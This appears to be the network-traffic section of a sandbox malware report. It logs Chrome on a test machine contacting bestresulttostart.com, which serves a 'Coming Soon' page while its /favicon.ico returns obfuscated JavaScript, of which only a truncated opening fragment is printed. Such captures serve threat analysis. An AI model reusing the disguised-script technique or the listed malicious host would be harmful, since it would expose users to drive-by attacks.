              Apr 17, 2024 22:59:16.013355970 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.013403893 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.013408899 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.013520956 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.013564110 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.013569117 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.066143036 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.066153049 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.114128113 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.220474958 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.220582962 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.220624924 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.220645905 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.220654964 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.220711946 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.220731974 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.221137047 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.221147060 CEST44349740193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:16.221167088 CEST49740443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:16.470252991 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:16.470335007 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:16.470607042 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:16.471950054 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:16.472026110 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:16.693850040 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:16.749327898 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:17.879050970 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:17.879132032 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:17.882977962 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:17.883017063 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:17.883064985 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:17.926485062 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:18.325459957 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:18.325547934 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:18.325731993 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:18.328042984 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:18.328078985 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:18.553715944 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:18.553812027 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:18.569072962 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:18.569147110 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:18.570137978 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:18.614100933 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:18.699296951 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:18.699686050 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:18.754607916 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:18.754621029 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:18.801482916 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:19.046083927 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.088144064 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.152704000 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.152851105 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.152920961 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.156369925 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.156414032 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.156445026 CEST49743443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.156461000 CEST44349743184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.217327118 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.217366934 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.217564106 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.218579054 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.218651056 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.434824944 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.434911966 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.440512896 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.440542936 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.440848112 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.443058968 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.484159946 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.534544945 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:19.534636021 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:19.534708977 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:19.535331011 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:19.535365105 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:19.640458107 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.640511990 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.640716076 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.643040895 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.643040895 CEST49744443192.168.2.4184.31.62.93
              Apr 17, 2024 22:59:19.643105030 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.643142939 CEST44349744184.31.62.93192.168.2.4
              Apr 17, 2024 22:59:19.968231916 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:19.968513966 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:19.968564987 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:19.969639063 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:19.969707966 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:19.970096111 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:19.970166922 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:19.970374107 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:19.970391035 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.015054941 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.383397102 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.383424997 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.383449078 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.383487940 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.383503914 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.383503914 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.383553028 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.383593082 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.383614063 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.589642048 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.589673996 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.589693069 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.589745998 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:20.589755058 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.589905977 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.598093033 CEST49745443192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:20.598140001 CEST44349745193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:26.707943916 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:26.708128929 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:26.708213091 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:28.217509031 CEST49742443192.168.2.4172.253.124.106
              Apr 17, 2024 22:59:28.217569113 CEST44349742172.253.124.106192.168.2.4
              Apr 17, 2024 22:59:43.671863079 CEST8049736193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:43.671956062 CEST4973680192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:44.252192020 CEST4973680192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:44.456676960 CEST8049736193.163.7.113192.168.2.4
              Apr 17, 2024 22:59:58.468707085 CEST4973580192.168.2.4193.163.7.113
              Apr 17, 2024 22:59:58.678612947 CEST8049735193.163.7.113192.168.2.4
              Apr 17, 2024 23:00:14.172800064 CEST4973580192.168.2.4193.163.7.113
              Apr 17, 2024 23:00:14.382476091 CEST8049735193.163.7.113192.168.2.4
              Apr 17, 2024 23:00:14.382544041 CEST4973580192.168.2.4193.163.7.113
              Apr 17, 2024 23:00:16.307564020 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:16.307641983 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:16.307816029 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:16.308001041 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:16.308039904 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:16.527964115 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:16.528264999 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:16.528323889 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:16.529046059 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:16.529903889 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:16.530033112 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:16.578113079 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:20.969044924 CEST4972380192.168.2.4199.232.214.172
              Apr 17, 2024 23:00:20.969299078 CEST4972480192.168.2.4199.232.214.172
              Apr 17, 2024 23:00:21.072823048 CEST8049723199.232.214.172192.168.2.4
              Apr 17, 2024 23:00:21.072870016 CEST8049723199.232.214.172192.168.2.4
              Apr 17, 2024 23:00:21.072911978 CEST8049724199.232.214.172192.168.2.4
              Apr 17, 2024 23:00:21.072921991 CEST4972380192.168.2.4199.232.214.172
              Apr 17, 2024 23:00:21.072957993 CEST8049724199.232.214.172192.168.2.4
              Apr 17, 2024 23:00:21.073021889 CEST4972480192.168.2.4199.232.214.172
              Apr 17, 2024 23:00:26.534086943 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:26.534234047 CEST44349753172.253.124.106192.168.2.4
              Apr 17, 2024 23:00:26.534302950 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:28.173779011 CEST49753443192.168.2.4172.253.124.106
              Apr 17, 2024 23:00:28.173839092 CEST44349753172.253.124.106192.168.2.4
              TimestampSource PortDest PortSource IPDest IP
              Apr 17, 2024 22:59:11.931283951 CEST53565431.1.1.1192.168.2.4
              Apr 17, 2024 22:59:11.932423115 CEST53533791.1.1.1192.168.2.4
              Apr 17, 2024 22:59:12.634787083 CEST53602871.1.1.1192.168.2.4
              Apr 17, 2024 22:59:12.928076982 CEST6484053192.168.2.41.1.1.1
              Apr 17, 2024 22:59:12.928225994 CEST6508453192.168.2.41.1.1.1
              Apr 17, 2024 22:59:13.253396988 CEST53650841.1.1.1192.168.2.4
              Apr 17, 2024 22:59:13.258524895 CEST53648401.1.1.1192.168.2.4
              Apr 17, 2024 22:59:13.670605898 CEST5641453192.168.2.41.1.1.1
              Apr 17, 2024 22:59:13.670829058 CEST5319353192.168.2.41.1.1.1
              Apr 17, 2024 22:59:13.989984989 CEST53564141.1.1.1192.168.2.4
              Apr 17, 2024 22:59:13.998239040 CEST53531931.1.1.1192.168.2.4
              Apr 17, 2024 22:59:16.252331018 CEST6202153192.168.2.41.1.1.1
              Apr 17, 2024 22:59:16.252562046 CEST5572453192.168.2.41.1.1.1
              Apr 17, 2024 22:59:16.357214928 CEST53557241.1.1.1192.168.2.4
              Apr 17, 2024 22:59:16.357829094 CEST53620211.1.1.1192.168.2.4
              Apr 17, 2024 22:59:19.204499960 CEST5469453192.168.2.41.1.1.1
              Apr 17, 2024 22:59:19.205224991 CEST6232053192.168.2.41.1.1.1
              Apr 17, 2024 22:59:19.311165094 CEST53623201.1.1.1192.168.2.4
              Apr 17, 2024 22:59:19.533945084 CEST53546941.1.1.1192.168.2.4
              Apr 17, 2024 22:59:29.904892921 CEST53569251.1.1.1192.168.2.4
              Apr 17, 2024 22:59:32.538456917 CEST138138192.168.2.4192.168.2.255
              Apr 17, 2024 22:59:48.808496952 CEST53607371.1.1.1192.168.2.4
              Apr 17, 2024 23:00:11.172007084 CEST53613021.1.1.1192.168.2.4
              Apr 17, 2024 23:00:11.866554976 CEST53526321.1.1.1192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Apr 17, 2024 22:59:12.928076982 CEST192.168.2.41.1.1.10x2ebStandard query (0)bestresulttostart.comA (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:12.928225994 CEST192.168.2.41.1.1.10x3d91Standard query (0)bestresulttostart.com65IN (0x0001)false
              Apr 17, 2024 22:59:13.670605898 CEST192.168.2.41.1.1.10x51e3Standard query (0)bestresulttostart.comA (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:13.670829058 CEST192.168.2.41.1.1.10x9f9fStandard query (0)bestresulttostart.com65IN (0x0001)false
              Apr 17, 2024 22:59:16.252331018 CEST192.168.2.41.1.1.10xb8c3Standard query (0)www.google.comA (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:16.252562046 CEST192.168.2.41.1.1.10xfb8eStandard query (0)www.google.com65IN (0x0001)false
              Apr 17, 2024 22:59:19.204499960 CEST192.168.2.41.1.1.10xf1abStandard query (0)bestresulttostart.comA (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:19.205224991 CEST192.168.2.41.1.1.10xbd03Standard query (0)bestresulttostart.com65IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Apr 17, 2024 22:59:13.258524895 CEST1.1.1.1192.168.2.40x2ebNo error (0)bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:13.989984989 CEST1.1.1.1192.168.2.40x51e3No error (0)bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:16.357214928 CEST1.1.1.1192.168.2.40xfb8eNo error (0)www.google.com65IN (0x0001)false
              Apr 17, 2024 22:59:16.357829094 CEST1.1.1.1192.168.2.40xb8c3No error (0)www.google.com172.253.124.106A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:16.357829094 CEST1.1.1.1192.168.2.40xb8c3No error (0)www.google.com172.253.124.103A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:16.357829094 CEST1.1.1.1192.168.2.40xb8c3No error (0)www.google.com172.253.124.104A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:16.357829094 CEST1.1.1.1192.168.2.40xb8c3No error (0)www.google.com172.253.124.105A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:16.357829094 CEST1.1.1.1192.168.2.40xb8c3No error (0)www.google.com172.253.124.99A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:16.357829094 CEST1.1.1.1192.168.2.40xb8c3No error (0)www.google.com172.253.124.147A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:19.533945084 CEST1.1.1.1192.168.2.40xf1abNo error (0)bestresulttostart.com193.163.7.113A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:28.319523096 CEST1.1.1.1192.168.2.40x8008No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
              Apr 17, 2024 22:59:28.319523096 CEST1.1.1.1192.168.2.40x8008No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
              Apr 17, 2024 22:59:44.980669022 CEST1.1.1.1192.168.2.40x1e72No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
              Apr 17, 2024 22:59:44.980669022 CEST1.1.1.1192.168.2.40x1e72No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
              Apr 17, 2024 23:00:03.909961939 CEST1.1.1.1192.168.2.40x1dabNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
              Apr 17, 2024 23:00:03.909961939 CEST1.1.1.1192.168.2.40x1dabNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
              Apr 17, 2024 23:00:24.573575974 CEST1.1.1.1192.168.2.40x6623No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
              Apr 17, 2024 23:00:24.573575974 CEST1.1.1.1192.168.2.40x6623No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
              • bestresulttostart.com
              • https:
              • fs.microsoft.com
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449736193.163.7.113804296C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Apr 17, 2024 22:59:13.464292049 CEST436OUTGET / HTTP/1.1
              Host: bestresulttostart.com
              Connection: keep-alive
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate
              Accept-Language: en-US,en;q=0.9
              Apr 17, 2024 22:59:13.668490887 CEST360INHTTP/1.1 301 Moved Permanently
              Server: nginx
              Date: Wed, 17 Apr 2024 20:59:13 GMT
              Content-Type: text/html
              Content-Length: 162
              Connection: keep-alive
              Location: https://bestresulttostart.com/
              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.449735193.163.7.113804296C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              Apr 17, 2024 22:59:58.468707085 CEST6OUTData Raw: 00
              Data Ascii:


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449737193.163.7.1134434296C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-04-17 20:59:14 UTC664OUTGET / HTTP/1.1
              Host: bestresulttostart.com
              Connection: keep-alive
              Upgrade-Insecure-Requests: 1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Sec-Fetch-Site: none
              Sec-Fetch-Mode: navigate
              Sec-Fetch-User: ?1
              Sec-Fetch-Dest: document
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              sec-ch-ua-platform: "Windows"
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-04-17 20:59:14 UTC339INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 17 Apr 2024 20:59:14 GMT
              Content-Type: text/html; charset=utf-8
              Content-Length: 2569
              Connection: close
              Vary: Accept-Encoding
              Last-Modified: Mon, 08 Apr 2024 09:19:02 GMT
              ETag: "a09-615924bdc580c"
              Accept-Ranges: bytes
              Vary: Accept-Encoding
              Strict-Transport-Security: max-age=31536000;
              2024-04-17 20:59:14 UTC1030INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64
              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Coming Soon</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d
              2024-04-17 20:59:14 UTC1369INData Raw: 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 73 75 63 63 65 73 73 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 35 61 62 61 34 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 69 63 6f 6e 2d 6c 61 72 67 65 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 33 32 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 64 65 73 63 72 69 70 74 69 6f 6e 2d 74 65 78 74 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 30 37 30 37 30 3b 0a 09 09 09 09 6c 65 74 74
              Data Ascii: fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707070;lett
              2024-04-17 20:59:14 UTC170INData Raw: 73 65 20 63 68 65 63 6b 20 62 61 63 6b 20 73 6f 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 3c 73 74 72 6f 6e 67 3e 44 6f 6d 61 69 6e 3a 3c 2f 73 74 72 6f 6e 67 3e 20 62 65 73 74 72 65 73 75 6c 74 74 6f 73 74 61 72 74 2e 63 6f 6d 3c 2f 73 65 63 74 69 6f 6e 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: se check back soon.</p><section class="footer"><strong>Domain:</strong> bestresulttostart.com</section></div></div></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.449740193.163.7.1134434296C:\Program Files\Google\Chrome\Application\chrome.exe
              TimestampBytes transferredDirectionData
              2024-04-17 20:59:15 UTC598OUTGET /favicon.ico HTTP/1.1
              Host: bestresulttostart.com
              Connection: keep-alive
              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
              sec-ch-ua-mobile: ?0
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
              sec-ch-ua-platform: "Windows"
              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
              Sec-Fetch-Site: same-origin
              Sec-Fetch-Mode: no-cors
              Sec-Fetch-Dest: image
              Referer: https://bestresulttostart.com/
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              2024-04-17 20:59:16 UTC263INHTTP/1.1 200 OK
              Server: nginx
              Date: Wed, 17 Apr 2024 20:59:15 GMT
              Content-Type: application/javascript; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Strict-Transport-Security: max-age=31536000;
              2024-04-17 20:59:16 UTC1106INData Raw: 33 35 64 61 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 32 33 61 31 39 2c 5f 30 78 32 64 63 64 31 39 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 38 62 36 33 34 28 5f 30 78 33 63 36 65 64 38 2c 5f 30 78 31 30 32 32 34 36 2c 5f 30 78 39 61 31 61 62 62 2c 5f 30 78 33 38 39 36 36 31 2c 5f 30 78 35 64 36 30 36 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 31 30 32 32 34 36 2d 20 2d 30 78 65 63 2c 5f 30 78 33 63 36 65 64 38 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 64 30 37 61 28 5f 30 78 31 37 33 37 66 31 2c 5f 30 78 34 34 38 64 37 65 2c 5f 30 78 33 66 63 33 38 35 2c 5f 30 78 32 33 35 66 37 34 2c 5f 30 78 34 34 33 39 35 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 38 63 64 28 5f 30 78 34 34 33 39 35 37 2d 20 2d 30 78 32 65 32 2c 5f
              Data Ascii: 35da(function(_0x123a19,_0x2dcd19){function _0x58b634(_0x3c6ed8,_0x102246,_0x9a1abb,_0x389661,_0x5d6061){return _0x58cd(_0x102246- -0xec,_0x3c6ed8);}function _0x15d07a(_0x1737f1,_0x448d7e,_0x3fc385,_0x235f74,_0x443957){return _0x58cd(_0x443957- -0x2e2,_
